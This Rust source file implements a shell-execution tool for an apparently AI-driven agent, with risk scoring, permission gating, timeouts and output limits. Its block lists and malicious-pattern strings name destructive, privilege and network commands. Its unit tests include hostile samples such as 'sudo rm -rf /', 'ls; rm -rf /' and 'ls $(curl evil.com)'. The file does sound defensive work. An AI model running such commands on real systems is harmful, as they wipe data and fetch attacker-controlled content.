1use async_trait::async_trait;
5use serde::Deserialize;
6use serde_json::{json, Value};
7use std::collections::HashMap;
8use std::path::{Path, PathBuf};
9use std::process::Stdio;
10use tokio::process::Command;
11use tokio::time::{timeout, Duration};
12use uuid::Uuid;
13use chrono::Utc;
14use cfg_if::cfg_if;
15
16use super::{Tool, ToolContext, ToolResult, ToolError};
17use super::permission::{RiskLevel, create_permission_request};
18
19pub struct BashTool;
21
22#[derive(Debug, Deserialize)]
23struct BashParams {
24 command: String,
25 #[serde(default = "default_timeout")]
26 timeout: Option<u64>,
27 #[serde(default)]
28 description: Option<String>,
29 #[serde(default)]
30 environment: Option<HashMap<String, String>>,
31 #[serde(default)]
32 working_directory: Option<String>,
33}
34
35fn default_timeout() -> Option<u64> {
36 Some(120000) }
38
39const MAX_TIMEOUT: u64 = 600_000; const MAX_OUTPUT_LENGTH: usize = 30_000;
41
42const DANGEROUS_COMMANDS: &[&str] = &[
44 "rm", "rmdir", "del", "format", "fdisk", "mkfs", "dd", "shutdown",
45 "reboot", "halt", "init", "kill", "killall", "pkill", "sudo", "su",
46 "passwd", "chown", "chmod", "mount", "umount", "systemctl", "service",
47 "iptables", "ufw", "firewall-cmd"
48];
49
50const SYSTEM_COMMANDS: &[&str] = &[
52 "apt", "yum", "dnf", "pacman", "brew", "pip", "npm", "yarn", "cargo",
53 "git", "docker", "kubectl", "terraform", "ansible"
54];
55
56#[async_trait]
57impl Tool for BashTool {
58 fn id(&self) -> &str {
59 "bash"
60 }
61
62 fn description(&self) -> &str {
63 "Execute shell commands with security controls and timeout handling"
64 }
65
66 fn parameters_schema(&self) -> Value {
67 json!({
68 "type": "object",
69 "properties": {
70 "command": {
71 "type": "string",
72 "description": "The command to execute"
73 },
74 "timeout": {
75 "type": "number",
76 "description": "Optional timeout in milliseconds (max 600000ms / 10 minutes)",
77 "minimum": 1000,
78 "maximum": 600000
79 },
80 "description": {
81 "type": "string",
82 "description": "Clear, concise description of what this command does in 5-10 words"
83 },
84 "environment": {
85 "type": "object",
86 "description": "Additional environment variables",
87 "additionalProperties": {
88 "type": "string"
89 }
90 },
91 "workingDirectory": {
92 "type": "string",
93 "description": "Working directory for the command (relative to session working directory)"
94 }
95 },
96 "required": ["command"]
97 })
98 }
99
100 async fn execute(
101 &self,
102 args: Value,
103 ctx: ToolContext,
104 ) -> Result<ToolResult, ToolError> {
105 let params: BashParams = serde_json::from_value(args)
106 .map_err(|e| ToolError::InvalidParameters(e.to_string()))?;
107
108 let risk_assessment = self.assess_command_risk(¶ms.command);
110
111 self.validate_command_security(¶ms.command, &ctx)?;
113
114 let timeout_ms = params.timeout.unwrap_or(120_000).min(MAX_TIMEOUT);
116
117 let working_dir = if let Some(wd) = ¶ms.working_directory {
119 let requested_dir = if PathBuf::from(wd).is_absolute() {
120 PathBuf::from(wd)
121 } else {
122 ctx.working_directory.join(wd)
123 };
124
125 if !requested_dir.starts_with(&ctx.working_directory) {
127 return Err(ToolError::PermissionDenied(
128 "Working directory must be within session directory".to_string()
129 ));
130 }
131
132 requested_dir
133 } else {
134 ctx.working_directory.clone()
135 };
136
137 if risk_assessment.requires_permission {
139 let permission_request = create_permission_request(
140 Uuid::new_v4().to_string(),
141 ctx.session_id.clone(),
142 format!("Execute command: {}",
143 if params.command.len() > 50 {
144 format!("{}...", ¶ms.command[..50])
145 } else {
146 params.command.clone()
147 }
148 ),
149 risk_assessment.risk_level,
150 json!({
151 "command": params.command,
152 "description": params.description,
153 "working_directory": working_dir.to_string_lossy(),
154 "risk_factors": risk_assessment.risk_factors,
155 }),
156 );
157
158 if matches!(risk_assessment.risk_level, RiskLevel::High | RiskLevel::Critical) {
161 return Err(ToolError::PermissionDenied(format!(
162 "Command blocked due to security policy: {}",
163 risk_assessment.risk_factors.join(", ")
164 )));
165 }
166 }
167
168 let execution_result = self.execute_command(
170 ¶ms.command,
171 &working_dir,
172 timeout_ms,
173 ¶ms.environment,
174 &ctx,
175 ).await?;
176
177 let output = self.format_output(&execution_result)?;
179
180 let relative_wd = working_dir
182 .strip_prefix(&ctx.working_directory)
183 .unwrap_or(&working_dir)
184 .to_string_lossy()
185 .to_string();
186
187 let metadata = json!({
188 "command": params.command,
189 "description": params.description,
190 "exit_code": execution_result.exit_code,
191 "working_directory": relative_wd,
192 "timeout_ms": timeout_ms,
193 "stdout_bytes": execution_result.stdout.len(),
194 "stderr_bytes": execution_result.stderr.len(),
195 "truncated": execution_result.truncated,
196 "execution_time_ms": execution_result.execution_time_ms,
197 "risk_assessment": risk_assessment,
198 "timestamp": Utc::now().to_rfc3339(),
199 });
200
201 if execution_result.exit_code != 0 {
203 return Err(ToolError::ExecutionFailed(format!(
204 "Command exited with code {}: {}",
205 execution_result.exit_code,
206 output
207 )));
208 }
209
210 Ok(ToolResult {
211 title: params.description.unwrap_or_else(|| {
212 if params.command.len() > 50 {
213 format!("{}...", ¶ms.command[..50])
214 } else {
215 params.command.clone()
216 }
217 }),
218 metadata,
219 output,
220 })
221 }
222}
223
224#[derive(Debug, Clone, serde::Serialize)]
225struct CommandRiskAssessment {
226 risk_level: RiskLevel,
227 requires_permission: bool,
228 risk_factors: Vec<String>,
229}
230
231#[derive(Debug)]
232struct CommandExecutionResult {
233 stdout: String,
234 stderr: String,
235 exit_code: i32,
236 truncated: bool,
237 execution_time_ms: u128,
238}
239
240impl BashTool {
241 fn assess_command_risk(&self, command: &str) -> CommandRiskAssessment {
243 let mut risk_factors = Vec::new();
244 let mut risk_level = RiskLevel::Low;
245 let mut requires_permission = false;
246
247 let command_lower = command.to_lowercase();
248 let command_parts: Vec<&str> = command.split_whitespace().collect();
249 let base_command = command_parts.first().unwrap_or(&"").trim_start_matches("sudo ");
250
251 if DANGEROUS_COMMANDS.iter().any(|&cmd| base_command == cmd || base_command.ends_with(cmd)) {
253 risk_level = RiskLevel::Critical;
254 requires_permission = true;
255 risk_factors.push("Potentially destructive command".to_string());
256 }
257
258 if SYSTEM_COMMANDS.iter().any(|&cmd| base_command == cmd || base_command.starts_with(cmd)) {
260 risk_level = risk_level.max(RiskLevel::Medium);
261 requires_permission = true;
262 risk_factors.push("System modification command".to_string());
263 }
264
265 if command_lower.contains("sudo") || command_lower.contains("su ") {
267 risk_level = RiskLevel::Critical;
268 requires_permission = true;
269 risk_factors.push("Privilege escalation detected".to_string());
270 }
271
272 if command_lower.contains("curl") || command_lower.contains("wget") ||
274 command_lower.contains("nc ") || command_lower.contains("netcat") {
275 risk_level = risk_level.max(RiskLevel::Medium);
276 requires_permission = true;
277 risk_factors.push("Network operation".to_string());
278 }
279
280 if (command_lower.contains("rm ") || command_lower.contains("del ")) &&
282 (command_lower.contains("*") || command_lower.contains("?")) {
283 risk_level = RiskLevel::High;
284 requires_permission = true;
285 risk_factors.push("Bulk file deletion".to_string());
286 }
287
288 if command.contains("&&") || command.contains("||") || command.contains(";") ||
290 command.contains("|") || command.contains(">") || command.contains(">>") {
291 risk_level = risk_level.max(RiskLevel::Medium);
292 risk_factors.push("Complex shell operation".to_string());
293 }
294
295 CommandRiskAssessment {
296 risk_level,
297 requires_permission,
298 risk_factors,
299 }
300 }
301
302 fn validate_command_security(&self, command: &str, _ctx: &ToolContext) -> Result<(), ToolError> {
304 let malicious_patterns = [
306 "; rm -rf", "| rm -rf", "&& rm -rf", "|| rm -rf",
307 "$(curl", "$(wget", "`curl", "`wget",
308 "/etc/passwd", "/etc/shadow",
309 "format c:", "del /f /s /q",
310 ];
311
312 let command_lower = command.to_lowercase();
313 for pattern in &malicious_patterns {
314 if command_lower.contains(pattern) {
315 return Err(ToolError::PermissionDenied(format!(
316 "Command contains potentially malicious pattern: {}",
317 pattern
318 )));
319 }
320 }
321
322 if command.len() > 4096 {
324 return Err(ToolError::InvalidParameters(
325 "Command too long (>4096 characters)".to_string()
326 ));
327 }
328
329 Ok(())
330 }
331
332 async fn execute_command(
334 &self,
335 command: &str,
336 working_dir: &Path,
337 timeout_ms: u64,
338 environment: &Option<HashMap<String, String>>,
339 ctx: &ToolContext,
340 ) -> Result<CommandExecutionResult, ToolError> {
341 let start_time = std::time::Instant::now();
342
343 let mut cmd = self.create_platform_command(command);
345
346 cmd.current_dir(working_dir);
348
349 cmd.stdout(Stdio::piped())
351 .stderr(Stdio::piped())
352 .stdin(Stdio::null());
353
354 cmd.env("TERM", "xterm-256color");
356 cmd.env("FORCE_COLOR", "0"); cmd.env("NO_COLOR", "1");
358
359 if let Some(env) = environment {
360 for (key, value) in env {
361 if key.chars().all(|c| c.is_ascii_alphanumeric() || c == '_') {
363 cmd.env(key, value);
364 }
365 }
366 }
367
368 let output = match timeout(Duration::from_millis(timeout_ms), cmd.output()).await {
370 Ok(Ok(output)) => output,
371 Ok(Err(e)) => {
372 return Err(ToolError::ExecutionFailed(format!("Command failed to start: {}", e)));
373 }
374 Err(_) => {
375 return Err(ToolError::ExecutionFailed(format!(
376 "Command timed out after {} ms",
377 timeout_ms
378 )));
379 }
380 };
381
382 if *ctx.abort_signal.borrow() {
384 return Err(ToolError::Aborted);
385 }
386
387 let execution_time = start_time.elapsed().as_millis();
388
389 let stdout = String::from_utf8_lossy(&output.stdout);
391 let stderr = String::from_utf8_lossy(&output.stderr);
392
393 let combined_length = stdout.len() + stderr.len();
395 let truncated = combined_length > MAX_OUTPUT_LENGTH;
396
397 let (final_stdout, final_stderr) = if truncated {
398 let stdout_limit = MAX_OUTPUT_LENGTH * 3 / 4; let stderr_limit = MAX_OUTPUT_LENGTH - stdout_limit;
400
401 let truncated_stdout = if stdout.len() > stdout_limit {
402 format!("{}... (truncated)", &stdout[..stdout_limit])
403 } else {
404 stdout.to_string()
405 };
406
407 let truncated_stderr = if stderr.len() > stderr_limit {
408 format!("{}... (truncated)", &stderr[..stderr_limit])
409 } else {
410 stderr.to_string()
411 };
412
413 (truncated_stdout, truncated_stderr)
414 } else {
415 (stdout.to_string(), stderr.to_string())
416 };
417
418 Ok(CommandExecutionResult {
419 stdout: final_stdout,
420 stderr: final_stderr,
421 exit_code: output.status.code().unwrap_or(-1),
422 truncated,
423 execution_time_ms: execution_time,
424 })
425 }
426
427 fn create_platform_command(&self, command: &str) -> Command {
429 cfg_if! {
430 if #[cfg(target_os = "windows")] {
431 let mut cmd = Command::new("cmd");
432 cmd.args(["/C", command]);
433 cmd
434 } else {
435 let mut cmd = Command::new("bash");
436 cmd.args(["-c", command]);
437 cmd
438 }
439 }
440 }
441
442 fn format_output(&self, result: &CommandExecutionResult) -> Result<String, ToolError> {
444 let mut output_parts = Vec::new();
445
446 if !result.stdout.is_empty() {
447 output_parts.push(format!("<stdout>\n{}\n</stdout>", result.stdout));
448 }
449
450 if !result.stderr.is_empty() {
451 output_parts.push(format!("<stderr>\n{}\n</stderr>", result.stderr));
452 }
453
454 if output_parts.is_empty() {
455 output_parts.push("(no output)".to_string());
456 }
457
458 if result.truncated {
459 output_parts.push("\n(Output truncated due to length)".to_string());
460 }
461
462 Ok(output_parts.join("\n"))
463 }
464}
465
466impl RiskLevel {
467 fn max(self, other: RiskLevel) -> RiskLevel {
468 match (self, other) {
469 (RiskLevel::Critical, _) | (_, RiskLevel::Critical) => RiskLevel::Critical,
470 (RiskLevel::High, _) | (_, RiskLevel::High) => RiskLevel::High,
471 (RiskLevel::Medium, _) | (_, RiskLevel::Medium) => RiskLevel::Medium,
472 (RiskLevel::Low, RiskLevel::Low) => RiskLevel::Low,
473 }
474 }
475}
476
477#[cfg(feature = "wasm")]
478mod wasm_impl {
479 use super::*;
480
481 impl BashTool {
482 async fn execute_command(
483 &self,
484 _command: &str,
485 _working_dir: &Path,
486 _timeout_ms: u64,
487 _environment: &Option<HashMap<String, String>>,
488 _ctx: &ToolContext,
489 ) -> Result<CommandExecutionResult, ToolError> {
490 Err(ToolError::ExecutionFailed(
491 "Command execution not supported in WASM environment".to_string()
492 ))
493 }
494 }
495}
496
497#[cfg(test)]
498mod tests {
499 use super::*;
500
501 #[test]
502 fn test_risk_assessment() {
503 let tool = BashTool;
504
505 let assessment = tool.assess_command_risk("ls -la");
507 assert_eq!(assessment.risk_level, RiskLevel::Low);
508 assert!(!assessment.requires_permission);
509
510 let assessment = tool.assess_command_risk("git clone https://github.com/user/repo");
512 assert_eq!(assessment.risk_level, RiskLevel::Medium);
513 assert!(assessment.requires_permission);
514
515 let assessment = tool.assess_command_risk("rm -rf *.log");
517 assert_eq!(assessment.risk_level, RiskLevel::High);
518 assert!(assessment.requires_permission);
519
520 let assessment = tool.assess_command_risk("sudo rm -rf /");
522 assert_eq!(assessment.risk_level, RiskLevel::Critical);
523 assert!(assessment.requires_permission);
524 }
525
526 #[test]
527 fn test_security_validation() {
528 let tool = BashTool;
529 let ctx = ToolContext {
530 session_id: "test".to_string(),
531 message_id: "test".to_string(),
532 abort_signal: tokio::sync::watch::channel(false).1,
533 working_directory: PathBuf::from("/tmp"),
534 };
535
536 assert!(tool.validate_command_security("ls -la", &ctx).is_ok());
538
539 assert!(tool.validate_command_security("ls; rm -rf /", &ctx).is_err());
541
542 assert!(tool.validate_command_security("ls $(curl evil.com)", &ctx).is_err());
544 }
545}